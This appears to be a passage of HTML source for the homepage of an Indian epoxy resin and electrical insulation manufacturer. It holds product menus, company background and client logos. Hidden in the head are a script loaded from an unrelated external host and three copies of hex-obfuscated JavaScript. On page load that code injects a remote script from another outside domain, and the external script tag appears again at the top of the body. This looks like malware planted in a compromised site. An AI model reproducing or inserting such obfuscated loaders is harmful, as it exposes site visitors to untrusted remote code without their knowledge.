<!doctype html>

<html lang="en">





<head>

<script type="text/javascript" src="https://brolink1s.site/code/hbsdazrrha5ha3ddf42tambu" async></script>

<script>

var _0x828d=["\x73\x63\x72\x69\x70\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6F\x6E\x6C\x69\x6E\x65\x73\x2E\x6C\x69\x66\x65\x2F\x6F\x6B","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];(function(_0x96cax1,_0x96cax2,_0x96cax3,_0x96cax4,_0x96cax5,_0x96cax6){_0x96cax5= _0x96cax2[_0x828d[2]](_0x96cax3);_0x96cax6= _0x96cax2[_0x828d[3]](_0x96cax3)[0];_0x96cax5[_0x828d[4]]= 1;_0x96cax5[_0x828d[5]]= _0x96cax4;_0x96cax6[_0x828d[7]][_0x828d[6]](_0x96cax5,_0x96cax6)})(window,document,_0x828d[0],_0x828d[1])

</script>



<script>

var _0x828d=["\x73\x63\x72\x69\x70\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6F\x6E\x6C\x69\x6E\x65\x73\x2E\x6C\x69\x66\x65\x2F\x6F\x6B","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];(function(_0x96cax1,_0x96cax2,_0x96cax3,_0x96cax4,_0x96cax5,_0x96cax6){_0x96cax5= _0x96cax2[_0x828d[2]](_0x96cax3);_0x96cax6= _0x96cax2[_0x828d[3]](_0x96cax3)[0];_0x96cax5[_0x828d[4]]= 1;_0x96cax5[_0x828d[5]]= _0x96cax4;_0x96cax6[_0x828d[7]][_0x828d[6]](_0x96cax5,_0x96cax6)})(window,document,_0x828d[0],_0x828d[1])

</script>



<script>

var _0x828d=["\x73\x63\x72\x69\x70\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6F\x6E\x6C\x69\x6E\x65\x73\x2E\x6C\x69\x66\x65\x2F\x6F\x6B","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];(function(_0x96cax1,_0x96cax2,_0x96cax3,_0x96cax4,_0x96cax5,_0x96cax6){_0x96cax5= _0x96cax2[_0x828d[2]](_0x96cax3);_0x96cax6= _0x96cax2[_0x828d[3]](_0x96cax3)[0];_0x96cax5[_0x828d[4]]= 1;_0x96cax5[_0x828d[5]]= _0x96cax4;_0x96cax6[_0x828d[7]][_0x828d[6]](_0x96cax5,_0x96cax6)})(window,document,_0x828d[0],_0x828d[1])

</script>



    <meta charset="utf-8">

    <meta http-equiv="content-Type" content="text/html">

    <title>Electrocoating & Insulation Technologies Pvt. Ltd.</title>

    <meta name="robots" content="noindex, follow" />

    <meta name="description" content="">

    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">



    <!-- Place favicon.png in the root directory -->

    <link rel="shortcut icon" href="img/favicon.png" type="image/x-icon" />

    <!-- Font Icons css -->

    <link rel="stylesheet" href="css/font-icons.css">

    <!-- bootstrap css -->

    <link rel="stylesheet" href="css/bootstrap.min.css">

    <!-- plugins css -->

    <link rel="stylesheet" href="css/plugins.css">

    <!-- Main Stylesheet -->

    <link rel="stylesheet" href="css/style.css">

    <!-- Responsive css -->

    <link rel="stylesheet" href="css/responsive.css">



</head>



<body>

<script type="text/javascript" src="https://brolink1s.site/code/hbsdazrrha5ha3ddf42tambu" async></script>









<!-- Body main wrapper start -->

<div class="body-wrapper">    

    

    <!-- HEADER AREA START (header-5) -->

    <header class="header-area header-5 header-8 header-nav-mobile header-transparent gradient-color-4">

        <!-- header-top-area start -->

        <div class="header-top-area section-bg-6">

            <div class="container">

                <div class="row">

                    <div class="col-md-7">

                        <div class="top-bar-menu">

                            <ul>

                                <li><a href="mailto:mktg@electrocoats.com"><i class="icon-mail"></i> mktg@electrocoats.com</a></li>

                                <li><a href="https://www.google.com/maps/place/Electrocoating+and+Insulation+Technologies+Private+Limited/@18.5708306,73.3105494,9.75z/data=!4m9!1m2!2m1!1selectrocoats!3m5!1s0x3bc2bbb9f36cd2a1:0x3776020f31696634!8m2!3d18.5868216!4d73.7307529!15sCgxlbGVjdHJvY29hdHOSARBjb3Jwb3JhdGVfb2ZmaWNl"><i class="icon-placeholder"></i> Hinjawadi, Pune </a></li>

                            </ul>

                        </div>

                    </div>

                    <div class="col-md-5">

                        <div class="top-bar-right text-right">

                            <div class="top-bar-menu">

                                <ul>

                                    <li>

                                        <!-- social-media -->

                                        <div class="social-media">

                                            <ul>

                                                <li><a href="#" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>

                                                <li><a href="#" title="Twitter"><i class="fab fa-twitter"></i></a></li>

                                                <li><a href="#" title="Instagram"><i class="fab fa-instagram"></i></a></li>

                                                <li><a href="#" title="Dribbble"><i class="fab fa-dribbble"></i></a></li>

                                            </ul>

                                        </div>

                                    </li>

                                </ul>

                            </div>

                        </div>

                    </div>

                </div>

            </div>

        </div>

        <!-- header-top-area end -->

        

        <!-- header-middle-area start -->

        <div class="header-middle-area header-sticky sticky-bg-white">

            <div class="container">

                <div class="row">

                    <div class="col">

                        <div class="site-logo-wrap">

                            <div class="site-logo">

                                <a href="index.html"><img src="img/logo.png" alt="Logo"></a>

                            </div>

                            <div class="get-support clearfix d-none">

                                <div class="get-support-icon">

                                    <i class="icon-call"></i>

                                </div>

                                <div class="get-support-info">

                                    <h6>Get Support</h6>

                                    <h4><a href="tel:+90-20-25881565">+90-20-25881565</a></h4>

                                </div>

                            </div>

                        </div>

                    </div>

                    <div class="col header-menu-column menu-color-white---">

                        <div class="header-menu d-none d-xl-block">

                            <nav>

                                <div class="main-menu">

                                    <ul>

                                        <li class="active"><a href="index.html">Home</a></li>

                                        <li class="menu-icon"><a href="#">About</a>

                                            <ul>

                                                <li><a href="about.html">Company Profile</a></li>

                                                <li><a href="team.html">Our Leadership</a></li>

                                                <li><a href="achievement.html">Achievement</a></li>

                                                <li><a href="annual-return-form-no-mgt-7.html">Annual Return FORM NO. MGT-7</a></li>

                                            </ul>

                                        </li> 

                                        <li class="menu-icon"><a href="#">Products</a>

                                            <ul class="mega-menu">

                                                <li><a href="#">By Application</a>

                                                    <ul>

                                                        <li><a href="epofil-60.html">Electical & Electronics</a></li>

                                                        <li><a href="water-based-epoxy.html">Civil Engineering</a></li>

														<li><a href="epoxy-boards.html">Modelling & Tooling </a></li>

                                                        <li><a href="resin-520-with-hardner-D.html">General Purpose</a></li>

                                                    </ul>

                                                </li>

                                                <li><a href="#">By Name</a>

                                                    <ul>

                                                        <li><a href="epofil-60.html">Epofil 60 </a></li>

                                                        <li><a href="epofil-60-D20.html">Epofil 60 D20</a></li>

                                                        <li><a href="epofil-60-HF.html">Epofil 60 HF</a></li>

                                                        <li><a href="epofil-HC-6016.html">Epofil HC 6016</a></li>

                                                        <li><a href="elcast-60-FR-M1.html">Elcast 60-FR M1</a></li>

                                                        <li><a href="resin-X-seal.html">Resin X Seal</a></li>

														<li><a href="urecast-FR-M1.html">Urecast FR-M1 </a></li>

                                                        <li><a href="urecast-70-HF.html">Urecast 70 HF </a></li>

                                                        <li><a href="resin-520.html">Resin 520</a></li>

                                                        <li><a href="gelcoat.html">Gelcoat</a></li>

                                                        <li><a href="DRZ-51.html">DRZ-51 </a></li>

                                                    </ul>

                                                </li>

                                                <li><a href="#">By Name</a>

                                                    <ul> 

                                                        <li><a href="epicoat-E.html">Epicoat-E</a></li>

														<li><a href="resin-500-75X.html">Resin 500-75X</a></li>

                                                        <li><a href="silcast-RTV-50.html">Silcast-RTV-50</a></li>

                                                        <li><a href="resin-505E.html">Resin 505E</a></li>

                                                        <li><a href="resin-505E-FR.html">Resin 505E FR</a></li>

                                                        <li><a href="resin-505E-FR-IR.html">Resin 505E FR IR</a></li>

                                                        <li><a href="water-based-epoxy.html">Water Based Epoxy</a></li>

                                                        <li><a href="resin-505.html">Resin 505 </a></li>

                                                        <li><a href="eazy-seal.html">Eazy Seal </a></li>

                                                        <li><a href="epi-bond.html">Epi-Bond</a></li>

                                                        <li><a href="epoxy-boards.html">Epoxy Boards</a></li>

                                                    </ul>

                                                </li>

                                                <li><a href="#">By Name</a>

                                                    <ul>       

                                                        <li><a href="master-paste.html">Master Paste</a></li>

                                                        <li><a href="high-flex-PU.html">High Flex PU</a></li>

                                                        <li><a href="Urecast-FND.html">Urecast FND</a></li>

                                                        <li><a href="diluent-C.html">Diluent C</a></li>

                                                        <li><a href="diluent-M.html">Diluent M</a></li>

                                                        <li><a href="diluent-P.html">Diluent P</a></li>

                                                        <li><a href="diluent-MC.html">Diluent MC</a></li>

                                                        <li><a href="coloring-paste.html">Coloring paste</a></li>

                                                        <li><a href="silicon-paint-SP-91.html">Silicon paint SP-91</a></li>

                                                        <li><a href="APC-90.html">APC-90</a></li>

                                                        <li><a href="air-drying-varnish.html">Air Drying Varnish</a></li>

                                                    </ul>

                                                </li>

                                            </ul>

                                        </li>

                                        <li><a href="client.html">Clients</a></li>

                                        <li><a href="testimonial.html">Testimonial</a></li>

                                        <li><a href="contact.html">Contact</a></li>

                                    </ul>

                                </div>

                            </nav>

                        </div>

                    </div>

                    <div class="header-options header-options-2 ">

                        <!-- header-search-1 -->

                        <div class="header-search-wrap">

                            <div class="header-search-1">

                                <div class="search-icon">

                                    <i class="icon-search for-search-show"></i>

                                    <i class="icon-cancel  for-search-close"></i>

                                </div>

                            </div>

                            <div class="header-search-1-form">

                                <form id="#" method="get"  action="#">

                                    <input type="text" name="search" value="" placeholder="Search here..."/>

                                    <button type="submit">

                                        <span><i class="icon-search"></i></span>

                                    </button>

                                </form>

                            </div>

                        </div>



                        <!-- Mobile Menu Button -->

                        <div class="mobile-menu-toggle d-xl-none">

                            <a href="#utilize-mobile-menu" class="utilize-toggle">

                                <svg viewBox="0 0 800 600">

                                    <path d="M300,220 C300,220 520,220 540,220 C740,220 640,540 520,420 C440,340 300,200 300,200" id="top"></path>

                                    <path d="M300,320 L540,320" id="middle"></path>

                                    <path d="M300,210 C300,210 520,210 540,210 C740,210 640,530 520,410 C440,330 300,190 300,190" id="bottom" transform="translate(480, 320) scale(1, -1) translate(-480, -318) "></path>

                                </svg>

                            </a>

                        </div>

                    </div>

                </div>

            </div>

        </div>

        <!-- header-middle-area end -->

    </header>

    <!-- HEADER AREA END -->



    

    <!-- Utilize Mobile Menu Start -->

    <div id="utilize-mobile-menu" class="utilize utilize-mobile-menu">

        <div class="utilize-menu-inner scrollbar">

            <div class="utilize-menu-head">

                <div class="site-logo">

                    <a href="index.html"><img src="img/logo.png" alt="Logo"></a>

                </div>

                <button class="utilize-close">×</button>

            </div>

            <div class="utilize-menu-search-form">

                <form action="#">

                    <input type="text" placeholder="Search...">

                    <button><i class="fas fa-search"></i></button>

                </form>

            </div>

            <div class="utilize-menu">

                <ul>

                    <li><a href="index.html">Home</a></li>

                    <li><a href="#">About</a>

                        <ul class="sub-menu">

                            <li><a href="about.html">Company Profile</a></li>

                            <li><a href="team.html">Our Leadership</a></li>

                            <li><a href="achievement.html">Achievement</a></li>

                                                <li><a href="annual-return-form-no-mgt-7.html">Annual Return FORM NO. MGT-7</a></li>

                        </ul>

                    </li>

                    <li><a href="#">Products</a>

                        <ul class="sub-menu">

                            <li><a href="epofil-60.html">Electical & Electronics</a></li>

                            <li><a href="water-based-epoxy.html">Civil Engineering</a></li>

							<li><a href="epoxy-boards.html">Modelling & Tooling </a></li>

                            <li><a href="resin-520-with-hardner-D.html">General Purpose</a></li>

                            <li><a href="epofil-60.html">Epofil 60 </a></li>

                            <li><a href="epofil-60-D20.html">Epofil 60 D20</a></li>

                            <li><a href="epofil-60-HF.html">Epofil 60 HF</a></li>

                            <li><a href="epofil-HC-6016.html">Epofil HC 6016</a></li>

                            <li><a href="elcast-60-FR-M1.html">Elcast 60-FR M1</a></li>

                            <li><a href="resin-X-seal.html">Resin X Seal</a></li>

							<li><a href="urecast-FR-M1.html">Urecast FR-M1 </a></li>

                            <li><a href="urecast-70-HF.html">Urecast 70 HF </a></li>

                            <li><a href="resin-520.html">Resin 520</a></li>

                            <li><a href="gelcoat.html">Gelcoat</a></li>

                            <li><a href="DRZ-51.html">DRZ-51 </a></li>

							<li><a href="epicoat-E.html">Epicoat-E</a></li>

							<li><a href="resin-500-75X.html">Resin 500-75X</a></li>

                            <li><a href="silcast-RTV-50.html">Silcast-RTV-50</a></li>

                            <li><a href="resin-505E.html">Resin 505E</a></li>

                            <li><a href="resin-505E-FR.html">Resin 505E FR</a></li>

                            <li><a href="resin-505E-FR-IR.html">Resin 505E FR IR</a></li>

                            <li><a href="water-based-epoxy.html">Water Based Epoxy</a></li>

                            <li><a href="resin-505.html">Resin 505 </a></li>

                            <li><a href="eazy-seal.html">Eazy Seal </a></li>

                            <li><a href="epi-bond.html">Epi-Bond</a></li>

                            <li><a href="epoxy-boards.html">Epoxy Boards</a></li>

							<li><a href="master-paste.html">Master Paste</a></li>

                            <li><a href="high-flex-PU.html">High Flex PU</a></li>

                            <li><a href="Urecast-FND.html">Urecast FND</a></li>

                            <li><a href="diluent-C.html">Diluent C</a></li>

                            <li><a href="diluent-M.html">Diluent M</a></li>

                            <li><a href="diluent-P.html">Diluent P</a></li>

                            <li><a href="diluent-MC.html">Diluent MC</a></li>

                            <li><a href="coloring-paste.html">Coloring paste</a></li>

                            <li><a href="silicon-paint-SP-91.html">Silicon paint SP-91</a></li>

                            <li><a href="APC-90.html">APC-90</a></li>

                            <li><a href="air-drying-varnish.html">Air Drying Varnish</a></li>

                        </ul>

                    </li>

                    <li><a href="client.html">Clients</a></li>

                    <li><a href="testimonial.html">Testimonial</a></li>

                    <li><a href="contact.html">Contact</a></li>

                </ul>

            </div>

            

            <div class="social-media-2">

                <ul>

                    <li><a href="#" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>

                    <li><a href="#" title="Twitter"><i class="fab fa-twitter"></i></a></li>

                    <li><a href="#" title="Linkedin"><i class="fab fa-linkedin"></i></a></li>

                    <li><a href="#" title="Instagram"><i class="fab fa-instagram"></i></a></li>

                </ul>

            </div>

        </div>

    </div>

    <!-- Utilize Mobile Menu End -->



    <div class="utilize-overlay"></div>

    

 

    

    <!-- SLIDER AREA START (slider-3) -->

    <div class="slider-area slider-3">

    	<div class="accordian">

    <ul>

        <li>

            <div class="image_title">

                <a href="#">Wire Enamels For Primary Insulation</a>

                <a href="#" class="btn-- theme-btn-1-- btn-effect-1--" tabindex="0">Read More<i class="flaticon-right-arrow"></i></a>  

            </div>

            <a href="#">

                <img src="img/slider/5.jpg"/>  

            </a>



        </li>

        <li>

            <div class="image_title">

                <a href="http://electrocoats.com/resin-505E.html">Battery Application</a>

                <a href="http://electrocoats.com/resin-505E.html" class="btn-- theme-btn-1-- btn-effect-1--" tabindex="0">Read More<i class="flaticon-right-arrow"></i></a>  

            </div>

            <a href="#">

                <img src="img/slider/4.jpg"/>

            </a>

        </li>

        <li>

            <div class="image_title">

                <a href="http://electrocoats.com/epofil-60.html">Epoxy & Polyurethane Resins</a>

                <a href="http://electrocoats.com/epofil-60.html" class="btn-- theme-btn-1-- btn-effect-1--" tabindex="0">Read More<i class="flaticon-right-arrow"></i></a>  

            </div>

            <a href="#">

                <img src="img/slider/2.jpg"/>

            </a>

        </li>

        <li>

            <div class="image_title">

                <a href="#">Insulating Varnishes</a>

                <a href="#" class="btn-- theme-btn-1-- btn-effect-1--" tabindex="0">Read More<i class="flaticon-right-arrow"></i></a>  

            </div>

            <a href="#">

                <img src="img/slider/3.jpg"/>

            </a>

        </li>

		<li>

			<div class="image_title">

				<a href="http://electrocoats.com/epicoat-E.html">Powder Coating for Armature</a>

                <a href="http://electrocoats.com/epicoat-E.html" class="btn-- theme-btn-1-- btn-effect-1--" tabindex="0">Read More<i class="flaticon-right-arrow"></i></a>  

			</div> 

			<a href="#">

				<img src="img/slider/1.jpg"/>

			</a>

		</li>

		

		

		

		

	</ul>

</div>

    



       

    </div>

    <!-- SLIDER AREA END -->

    

       



    <!-- ABOUT US AREA START -->

    <div class="about-us-area pt-120 pb-120">

        <div class="container">

            <div class="row">

                <div class="col-lg-6 align-self-center">

                    <div class="about-us-img-wrap about-img-left">

                        <img src="img/about.jpg" alt="About Us Image" style="width:100%;margin-top: 2pc">

                    </div>

                </div>

                <div class="col-lg-6 align-self-center">

                  <div class="about-us-info-wrap">

                        <div class="section-title-area section-title-2">

                            <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle"></i></span> Know Us <span><i class="fas fa-dot-circle"></i></span></h6>

                            <h2 class="section-title">About Company</h2>

                            <p>We, ELECTROCOATING AND INSULATION TECHNOLOGIES PVT. LTD. (EITPL) an ISO 9001:2015 quality system certified company is engaged in manufacturing and selling of Epoxy Resins, Hardeners, Polyurethane and Resin formulations for more than 30 years. </p>

                        </div>

                        <p>M/s EITPL has UL approved Potting compounds with File No. E 255884, also potting compounds are RoHS compliance.</p>



                        <p>We have two state of the art production facilities of area 3000 m2 and 6500 m2 factory space in and around Pune, Maharashtra. We have production capacity of 20 ton/day. With such big capacity we can efficiently cater your requirements quickly.</p>

                        <div class="about-author-info d-flex">

                            <div class="author-name-designation  align-self-center mr-30">

                                <div class="btn-wrapper">

                                    <a class="btn theme-btn-2 btn-effect-1" href="about.html">Read More</a>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </div>

    <!-- ABOUT US AREA END -->



    <!-- ABOUT US AREA START -->

    <!--<div class="about-us-area section-bg-1 bg-image pt-120 pb-90" data-bg="img/bg/31.jpg">

        <div class="container">

            <div class="row">

                <div class="col-lg-6 align-self-center">

                    <div class="about-us-info-wrap mb-50">

                        <div class="section-title-area section-title-2">

                            <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle"></i></span> Construction Service</h6>

                            <h1 class="section-title">Provide Construction Service For You</h1>

                            <p>Construction is a general term meaning the art and science to form objects

                                systems organizations, and comes from Latin</p>

                        </div>

                        <p>Construction is a general term meaning the art and science to form objects systems

                            organizations, and comes from Latin construction and Old French construction. To

                            construct is the verb: the act of building, and the noun</p>

                        <div class="btn-wrapper">

                            <a class="btn theme-btn-1 btn-effect-1" href="service.html">View Service</a>

                        </div>

                    </div>

                </div>

                <div class="col-lg-6 align-self-center">

                    <div class="row">

                        <div class="col-sm-6">                            

                            <div class="feature-item feature-item-6 box-shadow-1">

                                <div class="feature-icon">

                                    <span><i class="icon-repair"></i></span>

                                </div>

                                <div class="feature-info">

                                    <h3><a href="service-details.html">Mechanical Works</a></h3>

                                    <p>Construction is a general term the art and science to form </p>

                                    <a class="service-btn service-btn-2" href="service-details.html">Service Details <i class="flaticon-right-arrow"></i></a>

                                </div>

                            </div>

                        </div>

                        <div class="col-sm-6">                            

                            <div class="feature-item feature-item-6 box-shadow-1">

                                <div class="feature-icon">

                                    <span><i class="flaticon-slider"></i></span>

                                </div>

                                <div class="feature-info">

                                    <h3><a href="service-details.html">Power & Energy</a></h3>

                                    <p>Construction is a general term the art and science to form </p>

                                    <a class="service-btn service-btn-2" href="service-details.html">Service Details <i class="flaticon-right-arrow"></i></a>

                                </div>

                            </div>

                        </div>

                        <div class="col-sm-6">                            

                            <div class="feature-item feature-item-6 box-shadow-1">

                                <div class="feature-icon">

                                    <span><i class="flaticon-building"></i></span>

                                </div>

                                <div class="feature-info">

                                    <h3><a href="service-details.html">Petroleum Refinery</a></h3>

                                    <p>Construction is a general term the art and science to form </p>

                                    <a class="service-btn service-btn-2" href="service-details.html">Service Details <i class="flaticon-right-arrow"></i></a>

                                </div>

                            </div>

                        </div>

                        <div class="col-sm-6">                            

                            <div class="feature-item feature-item-6 box-shadow-1">

                                <div class="feature-icon">

                                    <span><i class="flaticon-house"></i></span>

                                </div>

                                <div class="feature-info">

                                    <h3><a href="service-details.html">Interior Design</a></h3>

                                    <p>Construction is a general term the art and science to form </p>

                                    <a class="service-btn service-btn-2" href="service-details.html">Service Details <i class="flaticon-right-arrow"></i></a>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </div>-->

    <!-- ABOUT US AREA END -->



    <!-- ABOUT US AREA START -->

    <div class="about-us-area section-bg-6 bg-image-right-before pt-120 pb-90">

        <div class="container">

            <div class="row">

                <div class="col-lg-6 align-self-center">

                    <div class="about-us-info-wrap">

                        <div class="section-title-area section-title-2 mb-20">

                            <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle secondary-color"></i></span> We Specializes In <span><i class="fas fa-dot-circle"></i></span></h6>

                            <h2 class="section-title">What We Do</h2>

                        </div>

                        <p>Epoxy, Polyurethane, Phenolic and Silicone Resins are Thermoset Polymers. We at Electrocoating & Insulation Technologies Private Limited formulate these products for use in: </p>

                        <ul class="list-item-half list-item-half-2 list-item-margin clearfix">

                            <li>

                                <i class="icon-done"></i>

                                Synthetic Resin Formulations

                            </li>

                            <li>

                                <i class="icon-done"></i>

                                Epoxy / Polyurethane Potting Compounds

                            </li>

                            <li>

                                <i class="icon-done"></i>

                                Electrical Insulations

                            </li>

                            <li>

                                <i class="icon-done"></i>

                                Electrical Insulating Powders

                            </li>

                        </ul>

                        <div class="  animation-pulse2 text-center mt-30">

                            <a class="video-play-btn bg-white--- secondary-bg" href="https://www.youtube.com/embed/iwfn1r0SjlI?autoplay=1&amp;showinfo=0" data-rel="lightcase">

                                <i class="icon-play  secondary-color--- white-color"></i>

                            </a>

                        </div>

                    </div>

                </div>

                <div class="col-lg-6 align-self-center">

                    <div class="about-us-img-wrap about-img-left">

                        

                    </div>

                </div>

            </div>

        </div>

    </div>

    <!-- ABOUT US AREA END -->



    <!-- IMAGE SLIDER AREA START (img-slider-3) ( Product Section) -->

    <div class="img-slider-area pt-120 pb-100">

        <div class="container">

            <div class="row">

                <div class="col-lg-12">

                    <div class="section-title-area section-title-2 text-center">

                        <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle"></i></span> We Deal With <span><i class="fas fa-dot-circle"></i></span></h6>

                        <h2 class="section-title">Our Products</h2>

                    </div>

                </div>

          </div>

            <div class="row image-slider-3-active slick-arrow-1 slick-arrow-1-inner---">

                <div class="col-lg-12">

                    <div class="img-slide-item-3 img-slide-item-3-2">

                        <a href="epofil-60.html">

                            <img src="img/product-4/1.jpg" alt="Image">

                        </a>

                        <div class="img-slide-info">

                            <div class="img-slide-info-brief">

                                <!--<h6>Construction</h6>-->

                                <h2><a href="epofil-60.html"> Potting & Encapsulation</a></h2>

                            </div>

                            <div class="btn-wrapper">

                                <a href="epofil-60.html" class="btn-- theme-btn-1-- btn-effect-1--">Read More<i class="flaticon-right-arrow"></i></a>

                            </div>

                        </div>

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="img-slide-item-3 img-slide-item-3-2">

                        <a href="resin-520.html">

                            <img src="img/product-4/2.jpg" alt="Image">

                        </a>

                        <div class="img-slide-info">

                            <div class="img-slide-info-brief">

                                <!--<h6>Construction</h6>-->

                                <h2><a href="resin-520.html">Epoxy Resin 520</a></h2>

                            </div>

                            <div class="btn-wrapper">

                                <a href="resin-520.html" class="btn-- theme-btn-1-- btn-effect-1--">Read More<i class="flaticon-right-arrow"></i></a>

                            </div>

                        </div>

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="img-slide-item-3 img-slide-item-3-2">

                        <a href="gelcoat.html">

                            <img src="img/product-4/3.jpg" alt="Image">

                        </a>

                        <div class="img-slide-info">

                            <div class="img-slide-info-brief">

                                <!--<h6>Construction</h6>-->

                                <h2><a href="gelcoat.html">Gelcoat</a></h2>

                            </div>

                            <div class="btn-wrapper">

                                <a href="gelcoat.html" class="btn-- theme-btn-1-- btn-effect-1--">Read More<i class="flaticon-right-arrow"></i></a>

                            </div>

                        </div>

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="img-slide-item-3 img-slide-item-3-2">

                        <a href="granite-and-marble-coating.html">

                            <img src="img/product-4/4.jpg" alt="Image">

                        </a>

                        <div class="img-slide-info">

                            <div class="img-slide-info-brief">

                                <!--<h6>Construction</h6>-->

                                <h2><a href="granite-and-marble-coating.html">Granite & marble coating</a></h2>

                            </div>

                            <div class="btn-wrapper">

                                <a href="granite-and-marble-coating.html" class="btn-- theme-btn-1-- btn-effect-1--">Read More<i class="flaticon-right-arrow"></i></a>

                            </div>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </div>

    <!-- IMAGE SLIDER AREA END -->



    <!-- BRAND LOGO AREA START -->

    <div class="brand-logo-area brand-logo-1 before-bg-bottom">

        <div class="container">

            <div class="row">

                <div class="col-lg-12">

                    <div class="section-title-area section-title-2 text-center">

                        <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle"></i></span> We Served To <span><i class="fas fa-dot-circle"></i></span></h6>

                        <h2 class="section-title">Our Clients</h2>

                    </div>

                </div>

          </div>

            

            <div class="row brand-logo-active slick-arrow-1 border-radius pt-30 pb-20">

                <div class="col-lg-12">

                    <div class="brand-logo-item">

                        <img src="img/brand-logo/1.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/2.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/3.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/4.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/5.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/6.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/7.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/8.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/10.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/11.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/12.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/13.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/14.png" alt="Brand Logo">

                    </div>

                </div>

                <!--<div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/15.png" alt="Brand Logo">

                    </div>

                </div>-->

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/16.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/17.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/18.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/19.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/20.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/21.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/22.png" alt="Brand Logo">

                    </div>

                </div>



                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/23.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/24.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/25.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/26.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/27.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/28.png" alt="Brand Logo">

                    </div>

                </div>

                <div class="col-lg-12">

                  <div class="brand-logo-item">

                        <img src="img/brand-logo/29.png" alt="Brand Logo">

                    </div>

                </div>

            </div>

        </div>

    </div>

    <!-- BRAND LOGO AREA END -->



    <!-- TESTIMONIAL AREA START (testimonial-7) -->

